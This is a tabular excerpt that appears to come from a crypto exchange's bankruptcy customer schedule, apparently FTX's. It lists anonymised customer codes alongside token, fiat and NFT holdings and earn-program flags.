| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07348530 | | BRZ[1], TRX[1], USD[0.00] | | |
| 07348531 | | BAT[2.05782792], BRZ[1], CUSDT[3], DOGE[1], LTC[3.82610157], SOL[5.50643181], TRX[3], USD[0.00], USDT[.97159455] | Yes | |
| 07348532 | | USD[10.00] | | |
| 07348533 | | BRZ[57.2448803], DOGE[.99996144], GRT[1], USD[0.00] | | |
| 07348534 | | DOGE[0], USD[0.00] | | |
| 07348535 | | USD[0.00] | | |
| 07348536 | | TRX[3.28128745], USD[0.00] | Yes | |
| 07348537 | | USD[10.00] | | |
| 07348538 | | SOL[1.19211373], USD[0.00] | Yes | |
| 07348539 | | CUSDT[11], SHIB[5.87857386], TRX[2], USD[0.01], USDT[1.10173411] | Yes | |
| 07348540 | | DOGE[1300.5], ETH[.00284], ETHW[.00284], USD[0.49] | | |
| 07348541 | | GRT[4.54721367], USD[0.00] | Yes | |
| 07348542 | | BTC[.00021174], CUSDT[1], NFT (37160962842687506//Fortune Cookies #381)[1], SOL[.00000926], USD[0.00] | Yes | |
| 07348543 | | USD[10.00] | | |
| 07348544 | | USD[10.00] | | |
| 07348545 | | USD[10.00] | | |
| 07348546 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07348547 | | USD[10.00] | | |
| 07348548 | | DOGE[19.42199973], USD[0.00] | | |
| 07348549 | | TRX[112.64013841], USD[0.00] | | |
| 07348550 | | USD[10.00] | | |
| 07348551 | | USD[10.00] | | |
| 07348552 | | BRZ[2], BTC[0.00370753], CUSDT[3], DOGE[1432.81027123], TRX[2], USD[0.00] | | |
| 07348556 | | DOGE[0], USD[0.00], USDT[0] | | |
| 07348558 | | BTC[.00212564], CUSDT[6], ETH[.03003215], ETHW[.03003215], TRX[1], USD[0.00] | | |
| 07348559 | | USD[10.00] | | |
| 07348560 | | DOGE[1], USD[0.00] | | |
| 07348562 | | CUSDT[2], DOGE[4788.08133637], USD[10.00] | | |
| 07348563 | | NFT (429435522525425157/Coachella x FTX Weekend 2 #6043)[1], USD[10.00] | | |
| 07348564 | | CUSDT[3], DOGE[135.63255487], USD[0.26] | | |
| 07348565 | | BTC[0.00001870], DOGE[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07348566 | | USD[10.00] | | |
| 07348567 | | USD[10.00] | | |
| 07348568 | | BRZ[2], CUSDT[1], DOGE[0], TRX[0], UNI[.00004529], USD[0.00] | | |
| 07348569 | | USD[10.00] | | |
| 07348570 | | DOGE[138.30663715], USD[0.00] | | |
| 07348571 | | CUSDT[3], DOGE[218.45831384], TRX[1], USD[0.00] | Yes | |
| 07348572 | | DOGE[2.79434728], LTC[.05526102], SUSHI[.00004353], USD[0.00] | | |
| 07348573 | | USD[10.00] | | |
| 07348575 | | USD[10.00] | | |
| 07348576 | | USD[10.00] | | |
| 07348577 | | USD[10.00] | | |
| 07348578 | | CUSDT[2], DOGE[2], USD[26.38] | | |
| 07348579 | | CUSDT[5], TRX[320.40399243], USD[0.00] | | |
| 07348580 | | USD[0.02] | Yes | |
| 07348581 | | BAT[1], GRT[1], USD[10.00], USDT[0] | | |
| 07348582 | | CUSDT[9], DOGE[1], USD[0.01] | | |
| 07348584 | | CUSDT[1], DOGE[23.83393079], USD[0.00] | Yes | |
| 07348585 | | USD[10.00] | | |
| 07348586 | | BRZ[1], DOGE[852.42335435], USD[0.00] | | |
| 07348587 | | USD[0.00] | | |
| 07348588 | | USD[10.00] | | |
| 07348589 | | BRZ[1], DOGE[.00002208], USD[0.00] | | |
| 07348590 | | CUSDT[3], SHIB[123890.30191153], TRX[2], USD[0.00] | Yes | |
| 07348591 | | DOGE[0], LTC[0] | | |
| 07348592 | | USD[0.08] | | |
| 07348593 | | USD[10.00] | | |
| 07348594 | | CUSDT[2], DOGE[207.08561983], GRT[55.57562968], TRX[925.7012144], UNI[2.50705896], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07348597 | | BTC[.00067403], CUSDT[1], DOGE[870.54600472], ETH[.01500598], ETHW[.01500598], LTC[.13302431], TRX[211.08353187], USD[0.00], YFI[.00071535] | | |
| 07348598 | | USD[10.00] | | |
| 07348599 | | USD[10.00] | | |
| 07348600 | | DOGE[1.00010087], USD[0.00] | Yes | |
| 07348601 | | DOGE[1780.62050794], TRX[1], USD[12.00] | | |
| 07348602 | | USD[10.00] | | |
| 07348603 | | BTC[.00190281], DOGE[1], NFT (483085276573425469/Bahrain Ticket Stub #824)[1], SHIB[1], USD[0.00] | Yes | |
| 07348604 | | TRX[1], USD[0.00] | | |
| 07348605 | | BTC[0], DOGE[1], USD[0.00] | | |
| 07348606 | | USD[10.00] | | |
| 07348607 | | DOGE[1], LINK[4.11954375], SOL[50.58458679], USD[10.13] | | |
| 07348608 | | USD[10.00] | | |
| 07348609 | | DOGE[25.2625824], USD[0.00] | Yes | |
| 07348610 | | BAT[13.07737479], BRZ[2], CUSDT[1], DOGE[2], ETH[0.00005008], ETHW[1.39538049], GRT[1], SOL[0.00046806], USD[2312.11], USDT[0] | Yes | |
| 07348611 | | USD[10.00] | | |
| 07348612 | | DOGE[1], GRT[0], KSHIB[1.79358224], MATIC[0], SHIB[0], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07348613 | | DOGE[0], USD[0.01] | | |
| 07348614 | | USD[10.00] | | |
| 07348615 | | USD[10.00] | | |
| 07348616 | | DOGE[209.80108743], USD[0.00] | Yes | |
| 07348617 | | BTC[0], ETH[0], LINK[0] | | |
| 07348618 | | USD[10.00] | | |
| 07348620 | | ALGO[5875.59330254], CUSDT[2], DOGE[1], SHIB[88159992.69036379], TRX[6890.18076864], USD[0.00] | Yes | |
| 07348621 | | DOGE[32.74137529], USD[0.00] | | |
| 07348622 | | BTC[0], USD[0.00], USDT[0] | | |
| 07348623 | | NFT (363937390343712064/Milan)[1] | | |
| 07348624 | | USD[10.00] | | |
| 07348625 | | BAT[0], CUSDT[30], DOGE[0], LINK[0], SHIB[484358.32512981], TRX[0], UNI[0], USD[0.01], USDT[1.06403978] | Yes | |
| 07348626 | | USD[10.00] | | |
| 07348628 | | BF_POINT[200], BTC[0], GRT[0], MATIC[354.70290972], SOL[0], USD[0.80], USDT[0] | Yes | |
| 07348629 | | TRX[1], USD[0.00], USDT[0] | | |
| 07348630 | | DOGE[0], ETH[.4419586], ETHW[0.03651893], GRT[0], LINK[0], USD[15563.58], USDT[0] | Yes | |
| 07348631 | | TRX[.000001], USD[0.01], USDT[0] | | |
| 07348632 | | USD[10.00] | | |
| 07348633 | | BTC[0], DAI[.00000001], ETH[0.02700000], LINK[0], MATIC[34.66849597], SOL[0], USD[6.56] | | |
| 07348634 | | USD[10.00] | | |
| 07348635 | | CUSDT[1], DOGE[.52417297], TRX[1], USD[59.32] | | |
| 07348636 | | CUSDT[1], USD[72.57] | | |
| 07348637 | | CUSDT[1], DOGE[32.05360542], USD[10.00] | | |
| 07348638 | | USD[10.00] | | |
| 07348639 | | USD[10.00] | | |
| 07348641 | | USD[125.00] | | |
| 07348642 | | USD[0.01] | | |
| 07348643 | | USD[10.00] | | |
| 07348646 | | BTC[.00227444], DOGE[156098.24459099], ETH[.0607021], ETHW[.05998066], LTC[3.22071219], SHIB[2324024.17335947], TRX[1975.23910027], USD[0.00] | Yes | |
| 07348647 | | USD[10.00] | | |
| 07348648 | | BRZ[8.82031437], CUSDT[13], DOGE[8747.39826524], GRT[644.31067806], MATIC[137.11995726], NFT (320458645838703461/Entrance Voucher #3177)[1], SHIB[8546339.66007552], SOL[16.47526394], TRX[1422.36848136], USD[0.06] | Yes | |
| 07348650 | | USD[1.31], USDT[0] | | |
| 07348652 | | CUSDT[.00049651], NFT (289720492477533596/Silverstone Ticket Stub #76)[1], NFT (298984717898258715/GSW Championship Commemorative Ring)[1], NFT (301588307614060939/FTX Crypto Cup 2022 Key #50)[1], NFT (325843805311214425/Montreal Ticket Stub #247)[1], NFT (349277980098581853/The 2974 Collection #0687)[1], NFT (356975024778366518/FTX - Off The Grid Miami #513)[1], NFT (359558136635842640/Austria Ticket Stub #113)[1], NFT (388166054643958944/Warriors Foam Finger #479)[1], NFT (449108730155302566/GSW Western Conference Finals Commemorative Banner #2254)[1], NFT (468246480289614655/Series 1: Wizards #406)[1], NFT (474312894681588199/GSW Western Conference Semifinals Commemorative Ticket #944)[1], NFT (497860979387180086/Birthday Cake #0687)[1], NFT (503583752399407363/GSW Western Conference Finals Commemorative Banner #2253)[1], NFT (518141538722636580/Series 1: Capitals #445)[1], NFT (566170178641491474/2974 Floyd Norman - OKC 6-0157)[1], NFT (573513167629901802/Entrance Voucher #1469)[1], USD[0.00], USDT[0.00001094] | Yes | |
| 07348654 | | USD[10.00] | | |
| 07348655 | | BTC[0], SOL[0], USD[0.00] | | |
| 07348656 | | USD[0.00] | | |
| 07348657 | | USD[10.00] | | |
| 07348658 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07348659 | | BTC[.00006476], CUSDT[1], USD[0.00] | | |
| 07348660 | | CUSDT[1], DOGE[1], USD[10.00] | | |
| 07348661 | | BTC[0], CUSDT[2], DOGE[1], TRX[1], USD[0.00] | | |
| 07348662 | | USD[10.00] | | |
| 07348663 | | USD[10.00] | | |
| 07348664 | | GRT[6.02266679], USD[0.00] | Yes | |
| 07348665 | | BAT[1.0165555], CUSDT[1], DOGE[0], SOL[36.28291705], TRX[1.00000201], USD[0.00] | Yes | |
| 07348666 | | USD[10.00] | | |
| 07348667 | | USD[10.00] | | |
| 07348668 | | DOGE[1], SHIB[.00000002], USD[0.01] | | |
| 07348669 | | BTC[0], DOGE[1], USD[0.00] | | |
| 07348670 | | USD[10.00] | | |
| 07348671 | | CUSDT[4], DOGE[2], USD[0.00] | | |
| 07348672 | | BTC[.00020945], USD[0.00] | Yes | |
| 07348673 | | USD[10.00] | | |
| 07348675 | | USD[10.00] | | |
| 07348676 | | USD[10.00] | | |
| 07348678 | | USD[0.01] | | |
| 07348679 | | USD[0.20] | | |
| 07348680 | | USD[10.00] | | |
| 07348681 | | DOGE[1], USD[0.01] | | |
| 07348682 | | USD[10.00] | | |
| 07348683 | | USD[10.00] | | |
| 07348685 | | BF_POINT[200], BRZ[0], BTC[0.00486492], CUSDT[8], DOGE[2], ETH[0], SHIB[8], SOL[0], TRX[3], USD[0.00], USDT[0.00308771] | Yes | |
| 07348686 | | NFT (406436950014671654/Coachella x FTX Weekend 2 #8181)[1], USD[10.46] | Yes | |
| 07348687 | | BTC[0], DAI[0], ETH[0], SOL[0], USD[0.00], USDT[0] | | |
| 07348688 | | USD[10.00] | | |
| 07348689 | | BRZ[1], CUSDT[1], DOGE[4], TRX[2], USD[0.01] | | |
| 07348690 | | BAT[1], CUSDT[4], DAI[119.21015641], DOGE[524.35549796], GRT[2], TRX[178.19874107], USD[4.78] | | |
| 07348691 | | USD[10.00] | | |
| 07348694 | | USD[10.00] | | |
| 07348695 | | USD[10.00] | | |
| 07348696 | | BTC[0], CUSDT[1], NFT (371587313948332271/Fortuo Distinctus #93)[1], TRX[0.00222012], USD[0.00] | Yes | |
| 07348698 | | CUSDT[1], DOGE[197.14469604], USD[0.28], USDT[1] | | |
| 07348699 | | USD[10.00] | | |
| 07348700 | | USD[10.00] | | |
| 07348701 | | USD[10.00] | | |
| 07348702 | | USD[10.00] | | |
| 07348704 | | BTC[.00000039], CUSDT[2], DOGE[0], USD[0.00] | | |
| 07348705 | | BCH[0], BTC[0], DOGE[1], ETH[0], GRT[0], LINK[0], SOL[0], USD[0.01] | | |
| 07348706 | | BTC[.00014237], DOGE[255.99078849], USD[65.00] | | |
| 07348707 | | USD[701.15] | | |
| 07348708 | | DOGE[121.52579032], USD[0.00] | | |
| 07348709 | | USD[10.00] | | |
| 07348710 | | USD[10.00] | | |
| 07348711 | | USD[0.00] | | |
| 07348712 | | USD[10.00] | | |
| 07348713 | | USD[10.00] | | |
| 07348714 | | USD[0.48], USDT[0] | | |
| 07348716 | | BTC[.00012077], DOGE[1], SUSHI[1.20045396], USD[0.00] | Yes | |
| 07348717 | | DOGE[367.90114134], USD[0.00], USDT[4.9730307] | | |
| 07348718 | | USD[10.00] | | |
| 07348719 | | USD[10.00] | | |
| 07348720 | | USD[20.00] | | |
| 07348721 | | AVAX[0], BTC[0], CUSDT[0], DAI[0], DOGE[2], ETH[0], GRT[1], KSHIB[0], LTC[0], MATIC[0], NFT (318960819872529336/FTX - Off The Grid Miami #2318)[1], NFT (407805672067788397/Bahrain Ticket Stub #504)[1], NFT (524535764995853175/Barcelona Ticket Stub #1026)[1], SHIB[16013.35911014], SOL[0], SUSHI[0], TRX[2], USD[18.26], USDT[0] | Yes | |
| 07348722 | | CUSDT[1], GRT[264.44537801], USD[10.00] | | |
| 07348723 | | CUSDT[3], TRX[1], USD[0.01] | | |
| 07348724 | | CUSDT[470.39233407], DOGE[.4341049], ETH[.01432993], ETHW[.01432993], SHIB[2], USD[2.86] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07348725 | | USD[10.00] | | |
| 07348726 | | USD[10.00] | | |
| 07348727 | | USD[10.00] | | |
| 07348728 | | DOGE[3.00004349], USD[0.01] | | |
| 07348729 | | USD[10.00] | | |
| 07348730 | | USD[10.00] | | |
| 07348731 | | AAVE[0.03688266], CUSDT[5], GRT[.48592664], USD[0.48] | Yes | |
| 07348732 | | USD[10.00] | | |
| 07348733 | | USD[0.00] | | |
| 07348734 | | BTC[.00021243], USD[0.00] | | |
| 07348735 | | USD[10.00] | | |
| 07348736 | | DOGE[1], SHIB[16255228.99954597], TRX[1], USD[0.00], USDT[0.00000001] | | |
| 07348737 | | BTC[0], ETH[0.00078800], ETHW[0.00078800], SOL[0], SUSHI[0.02218569], USD[0.00], USDT[0] | | |
| 07348738 | | BRZ[0], DOGE[1], USD[0.00], USDT[0] | | |
| 07348739 | | DOGE[136.34726229], USD[0.00] | | |
| 07348740 | | TRX[584.652], USD[0.05] | | |
| 07348742 | | BRZ[1], CUSDT[2], DOGE[1], TRX[1], USD[0.01] | Yes | |
| 07348743 | | BRZ[0], BTC[0.00181383], ETH[0.20200504], ETHW[0.20182472], GRT[0], LINK[.39022869], USD[0.26] | Yes | |
| 07348744 | | USD[10.00] | | |
| 07348745 | | USD[10.00] | | |
| 07348746 | | BRZ[1], CUSDT[3], DOGE[1967.79294451], SHIB[9585128.49663584], SUSHI[39.19900322], TRX[1383.22228667], USD[0.00] | Yes | |
| 07348747 | | BAT[2.62263814], BTC[.00007436], PAXG[.00120789], USD[0.00] | | |
| 07348748 | | USD[10.00] | | |
| 07348749 | | USD[10.00] | | |
| 07348750 | | BAT[1.01655549], BRZ[2], CUSDT[10], GRT[1.00283561], TRX[11.21586143], USD[0.00], USDT[.00165539] | Yes | |
| 07348752 | | DOGE[27.86473432], USD[0.00] | | |
| 07348753 | | DOGE[1], USD[0.01] | Yes | |
| 07348754 | | USD[10.91] | Yes | |
| 07348756 | | USD[0.00] | | |
| 07348757 | | BAT[1], CUSDT[1], DOGE[7571.09627963], TRX[.89080364], USD[0.00] | | |
| 07348758 | | BRZ[1], CUSDT[2], DOGE[.34083391], TRX[2], USD[0.00] | | |
| 07348760 | | DOGE[68.68124792], USD[0.00] | | |
| 07348764 | | USD[10.00] | | |
| 07348765 | | USD[10.00] | | |
| 07348766 | | BAT[1], CUSDT[1], USD[0.00], USDT[0] | | |
| 07348767 | | BRZ[0], USD[0.00], USDT[0] | | |
| 07348770 | | USD[10.00] | | |
| 07348771 | | BF_POINT[300], BRZ[1], BTC[.00005494], CUSDT[5], ETH[.00140841], ETHW[.00139473], GRT[.31902879], LTC[.00671384], MATIC[0], SOL[.01457153], TRX[2], USD[0.01] | Yes | |
| 07348772 | | USD[10.00] | | |
| 07348773 | | USD[10.00] | | |
| 07348774 | | USD[10.00] | | |
| 07348775 | | USD[10.00] | | |
| 07348776 | | USD[10.00] | | |
| 07348777 | | USD[191.27] | | |
| 07348778 | | BTC[0], ETH[0], ETHW[0.00011163], SHIB[1], SOL[0], USD[0.00], USDT[0] | Yes | |
| 07348781 | | BTC[0], CUSDT[4], DOGE[0], USD[0.00] | | |
| 07348782 | | CUSDT[2], GRT[1.00248699], LINK[31.51049286], TRX[1], USD[0.00] | Yes | |
| 07348783 | | ETHW[.22561829], USD[2084.98] | Yes | |
| 07348784 | | BAT[1.0165555], BRZ[2], CUSDT[4], DOGE[7.36561929], TRX[4], USD[0.00] | Yes | |
| 07348785 | | BTC[0], DAI[.00000001], USD[0.04] | | |
| 07348786 | | USD[10.00] | | |
| 07348787 | | BRZ[1], CUSDT[2], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07348788 | | USD[11.09] | Yes | |
| 07348789 | | TRX[1], USD[0.00] | | |
| 07348790 | | USD[10.00] | | |
| 07348791 | | GRT[4.03288612], SOL[.55631915], USD[0.00] | | |
| 07348792 | | USD[0.07] | | |
| 07348794 | | BTC[.00020924], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07348795 | | USD[10.00] | | |
| 07348796 | | USD[10.00] | | |
| 07348797 | | BRZ[1], CUSDT[13], DOGE[0], GRT[0], LINK[0], SOL[0], TRX[3], USD[0.00] | Yes | |
| 07348798 | | GRT[0.49000000], SOL[0], SUSHI[0.18936708], USD[84.36] | | |
| 07348799 | | USD[10.00] | | |
| 07348800 | | CUSDT[1], DOGE[1], TRX[1], USD[0.01] | | |
| 07348801 | | USD[10.00] | | |
| 07348802 | | USD[10.00] | | |
| 07348803 | | USD[10.00] | | |
| 07348804 | | BTC[.00007216], ETH[.00015], ETHW[20.124808], SOL[.00934], SUSHI[.138], USD[59.25] | | |
| 07348805 | | DOGE[1], USD[0.01] | | |
| 07348806 | | USD[0.01] | | |
| 07348807 | | USD[10.00] | | |
| 07348808 | | AAVE[0], BAT[1], BRZ[1], BTC[0], CUSDT[5], DOGE[2.00010227], ETH[0.00694203], GRT[0], LINK[0], MATIC[0], NFT (469364003883798915/Rug Poll)[1], NFT (575401986273983909/Rug Poll [SE])[1], SHIB[8], SOL[.00000001], TRX[.000406], UNI[.00000001], USD[303.99], USDT[0.01000002] | Yes | |
| 07348810 | | USD[10.00] | | |
| 07348812 | | CUSDT[2.00000001], TRX[1], USD[4.47] | | |
| 07348813 | | SOL[.05037694], USD[0.02] | Yes | |
| 07348814 | | USD[10.00] | | |
| 07348815 | | TRX[10490.132783], USD[10.00] | | |
| 07348816 | | DOGE[189.43494506], USD[0.00] | Yes | |
| 07348817 | | USD[0.01], USDT[0] | | |
| 07348818 | | USD[0.00] | | |
| 07348820 | | USD[10.00] | | |
| 07348821 | | USD[10.00] | | |
| 07348822 | | BRZ[1], CUSDT[2], DOGE[251.03184524], TRX[357.73424295], USD[0.00] | | |
| 07348823 | | USD[10.00] | | |
| 07348824 | | SHIB[1], USD[0.00] | | |
| 07348825 | | BRZ[1], BTC[.01384042], CUSDT[12], DOGE[2932.42076781], ETH[.21873544], ETHW[.21851744], USD[0.41] | Yes | |
| 07348826 | | DOGE[1], USD[0.00] | | |
| 07348827 | | USD[15.20] | | |
| 07348828 | | BTC[.00017468], USD[0.00] | | |
| 07348829 | | BTC[.00021413], CUSDT[1], USD[0.00] | Yes | |
| 07348830 | | BRZ[1], CUSDT[2], DOGE[3], SOL[0], TRX[5], USD[0.00], USDT[1] | | |
| 07348831 | | USD[10.00] | | |
| 07348832 | | BAT[0], BRZ[0.00188552], CUSDT[1], DOGE[3], ETH[0], SGD[0.00], SOL[0], SUSHI[0], TRX[2], USD[0.01], USDT[0] | | |
| 07348833 | | USD[10.00] | | |
| 07348834 | | USD[10.00] | | |
| 07348835 | | USD[0.00] | | |
| 07348836 | | USD[10.00] | | |
| 07348837 | | BTC[0], ETH[0], SOL[0], USD[0.00], USDT[0.00000174] | | |
| 07348838 | | CUSDT[4], TRX[1], USD[0.01] | | |
| 07348839 | | CUSDT[7], USD[0.00] | | |
| 07348840 | | USD[10.00] | | |
| 07348841 | | USD[10.00] | | |
| 07348842 | | BRZ[70.15035753], BTC[0], CUSDT[5], DOGE[13], TRX[2], USD[10.00] | | |
| 07348843 | | UNI[.37816306], USD[0.00] | | |
| 07348844 | | CUSDT[2], DOGE[3596.2138356], USD[10.00] | | |
| 07348846 | | BAT[1], CUSDT[8], DOGE[66.75408824], ETH[.00039986], ETHW[.00039986], TRX[3], USD[0.98] | | |
| 07348847 | | USD[10.00] | | |
| 07348848 | | USD[10.00] | | |
| 07348849 | | BAT[1.01180965], BCH[.27123147], BRZ[294.86806141], BTC[.78949567], CAD[134.30], CUSDT[9], DAI[53.2773302], DOGE[2429.95007376], ETH[.08214449], ETHW[.0812864], EUR[32.17], GRT[158.34691637], LINK[5.83517828], SHIB[472369.40465447], SUSHI[13.98874418], TRX[7], UNI[5.9898156], USD[0.00], USDT[56.58152783] | Yes | |
| 07348850 | | TRX[4], USD[320.16], USDT[1] | | |
| 07348851 | | USD[10.00] | | |
| 07348852 | | USD[10.00] | | |
| 07348853 | | CUSDT[1], DOGE[.00001592], GRT[1], TRX[1], USD[0.01] | | |
| 07348854 | | USD[10.00] | | |
| 07348856 | | CUSDT[2], DOGE[35.58560915], ETH[0], ETHW[0], USD[0.00] | Yes | |
| 07348857 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07348858 | | DOGE[1.10453456], USD[0.00] | Yes | |
| 07348859 | | USD[10.00] | | |
| 07348860 | | USD[10.00] | | |
| 07348861 | | USD[0.00] | | |
| 07348862 | | USD[10.00] | | |
| 07348863 | | USD[10.97] | Yes | |
| 07348865 | | CUSDT[2], DOGE[1931.16439078], TRX[2], USD[0.00] | | |
| 07348866 | | USD[10.00] | | |
| 07348867 | | USD[10.00] | | |
| 07348868 | | CUSDT[2], DOGE[1532.05765352], SOL[.12603788], TRX[149.47330092], USD[0.00] | | |
| 07348869 | | BTC[.00994045], SHIB[6], USD[0.01] | Yes | |
| 07348870 | | CUSDT[1], DOGE[2164.6436017], USD[0.00] | | |
| 07348871 | | DOGE[149.84029891], USD[0.00] | Yes | |
| 07348872 | | DOGE[262.12106539], USD[0.05] | | |
| 07348873 | | USD[10.94] | Yes | |
| 07348874 | | PAXG[0.00002276], USD[0.00] | | |
| 07348875 | | USD[10.00] | | |
| 07348878 | | USD[10.00] | | |
| 07348879 | | DOGE[40.46453938], USD[0.00] | | |
| 07348880 | | USD[10.00] | | |
| 07348881 | | BCH[.00001152], USD[10.49] | | |
| 07348882 | | USD[10.00] | | |
| 07348883 | | USD[10.00] | | |
| 07348884 | | USD[10.00] | | |
| 07348885 | | USD[10.00] | | |
| 07348886 | | CUSDT[2], DOGE[10566.46446913], TRX[20546.40129206], UNI[20.76112984], USD[0.00] | | |
| 07348887 | | CUSDT[2], DOGE[1], SHIB[2], SOL[.00004344], USD[0.00] | Yes | |
| 07348890 | | USD[10.00] | | |
| 07348892 | | DOGE[312.93532237], TRX[2], USD[37.01] | | |
| 07348893 | | USD[458.85] | | |
| 07348894 | | DOGE[1.08442371], USD[16.32] | | |
| 07348895 | | CUSDT[2], DOGE[321.1037166], USD[0.76] | Yes | |
| 07348896 | | USD[0.00], YFI[.00017321] | Yes | |
| 07348897 | | USD[0.00] | Yes | |
| 07348899 | | USD[10.00] | | |
| 07348900 | | USD[10.00] | | |
| 07348902 | | BAT[1.0165555], BRZ[1], CUSDT[2], DOGE[1], LTC[.00000891], TRX[1], USD[0.00], USDT[0.01905708] | Yes | |
| 07348903 | | BAT[0], BCH[0], BRZ[0], BTC[0], DOGE[0], TRX[0], UNI[0], USD[0.00], USDT[0] | | |
| 07348905 | | BAT[110.8024025], CUSDT[185.79342521], DOGE[26101.70440745], LTC[1.09338678], SOL[.00001784], SUSHI[3.33233882], TRX[1163.86852397], UNI[.00005292], USD[100.17], USDT[1.09216713] | Yes | |
| 07348907 | | USD[11.08] | Yes | |
| 07348908 | | USD[10.00] | | |
| 07348909 | | USD[10.00] | | |
| 07348910 | | USD[10.00] | | |
| 07348911 | | USD[10.00] | | |
| 07348912 | | BCH[0], BF_POINT[300], BRZ[2], CUSDT[19], DOGE[1093.22830427], GRT[26.23871462], LTC[1.31321292], MATIC[84.46870368], SHIB[1], SOL[1.41873987], SUSHI[2.69850147], TRX[5], USD[0.00] | Yes | |
| 07348914 | | USD[0.00] | Yes | |
| 07348915 | | USD[10.00] | | |
| 07348916 | | DOGE[166.15455064], USD[0.00] | | |
| 07348917 | | CUSDT[2], DOGE[1], USD[0.00], USDT[0] | | |
| 07348918 | | USD[10.00] | | |
| 07348919 | | USD[8.13] | | |
| 07348920 | | USD[10.00] | | |
| 07348922 | | DOGE[1], ETH[.00034464], ETHW[.00034464], USD[27.12] | | |
| 07348923 | | BCH[.08183959], BTC[.00006458], CUSDT[2], DOGE[73.76763980], PAXG[.0072644], USD[-15.38] | Yes | |
| 07348924 | | USD[10.57] | | |
| 07348925 | | DOGE[123.8468772], USD[0.00] | | |
| 07348926 | | BAT[1.0165555], BRZ[5.07952967], BTC[0], CUSDT[3], GRT[1.00498957], SOL[3.69657256], SUSHI[1.68904193], TRX[0], USD[0.00] | Yes | |
| 07348927 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07348928 | | USD[10.00] | | |
| 07348929 | | USD[10.00] | | |
| 07348931 | | CUSDT[4], USD[0.39] | | |
| 07348933 | | USD[10.00] | | |
| 07348934 | | LINK[18.91273021], TRX[1], UNI[11.691465], USD[0.01], USDT[0] | | |
| 07348935 | | USD[10.00] | | |
| 07348936 | | CUSDT[8], TRX[76.02226656], USD[0.50] | | |
| 07348937 | | USD[10.00] | | |
| 07348938 | | ETH[.00262376], ETHW[.0025964], USD[0.00] | Yes | |
| 07348939 | | DOGE[55.20214833], USD[0.00] | | |
| 07348941 | | USD[10.00] | | |
| 07348942 | | CUSDT[9], DOGE[1047.1980725], TRX[337.83432253], USD[0.00] | | |
| 07348943 | | USD[10.00] | | |
| 07348944 | | BRZ[1], CUSDT[3], DOGE[41.48972029], TRX[1], USD[0.00] | | |
| 07348945 | | BAT[5.47315143], BRZ[4], CUSDT[10], DOGE[1094.06169678], GRT[80.45043088], NFT (39120322549678642/FTX - Off The Grid Miami #1631)[1], TRX[13.28483393], USD[0.00] | Yes | |
| 07348947 | | USD[0.01] | Yes | |
| 07348948 | | USD[10.00] | | |
| 07348949 | | SUSHI[.67754018], USD[0.00] | | |
| 07348950 | | USD[10.00] | | |
| 07348951 | | USD[10.00] | | |
| 07348952 | | AVAX[0], ETHW[.33895539], LINK[0], SUSHI[0], USD[0.02] | Yes | |
| 07348954 | | USD[10.00] | | |
| 07348955 | | USD[10.00] | | |
| 07348956 | | ALGO[.01042748], CUSDT[1], ETHW[.30747174], SHIB[3], TRX[4], UNI[.00051174], USD[0.00] | Yes | |
| 07348957 | | CUSDT[1], USD[0.01] | | |
| 07348958 | | USD[10.00] | | |
| 07348960 | | CUSDT[1], DOGE[666.48058008], USD[37.32] | | |
| 07348961 | | USD[10.00] | | |
| 07348962 | | CUSDT[13], TRX[3], USD[0.00] | | |
| 07348963 | | CUSDT[3], DOGE[.0013629], SHIB[3575761.50591346], TRX[3], USD[0.01] | | |
| 07348964 | | ETH[.00599267], ETHW[.00599267], USD[10.00] | | |
| 07348965 | | CUSDT[2], USD[0.00] | | |
| 07348967 | | BTC[.00005996], SOL[26.9], USD[0.32] | | |
| 07348968 | | USD[0.00] | | |
| 07348969 | | USD[10.00] | | |
| 07348970 | | CUSDT[.00000659], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[0], USD[0.00], USDT[0] | | |
| 07348971 | | USD[10.73] | Yes | |
| 07348973 | | USD[10.00] | | |
| 07348974 | | USD[10.00] | | |
| 07348975 | | USD[0.00] | | |
| 07348976 | | CUSDT[1], TRX[155.31013966], USD[0.00] | | |
| 07348978 | | USD[0.01] | | |
| 07348979 | | USD[10.00] | | |
| 07348980 | | USD[10.00] | | |
| 07348982 | | BRZ[1], DOGE[2], GRT[6.47315613], USD[0.31] | | |
| 07348983 | | USD[20.00] | | |
| 07348984 | | CUSDT[3], DOGE[0], USD[0.00] | | |
| 07348985 | | DOGE[16.03888018], USD[0.00] | | |
| 07348986 | | USD[10.00] | | |
| 07348988 | | USD[10.00] | | |
| 07348989 | | USD[10.00] | | |
| 07348990 | | USD[10.00] | | |
| 07348991 | | DOGE[116.37025465], USD[10.00] | | |
| 07348992 | | CUSDT[2], DOGE[441.03002318], ETH[.6547424], ETHW[.6547424], TRX[74.95416292], UNI[1], USD[31.71] | | |
| 07348993 | | USD[10.00] | | |
| 07348994 | | USD[10.00] | | |
| 07348995 | | DOGE[1], GRT[1], TRX[2], USD[0.00], USDT[0] | | |
| 07348996 | | USD[10.00] | | |

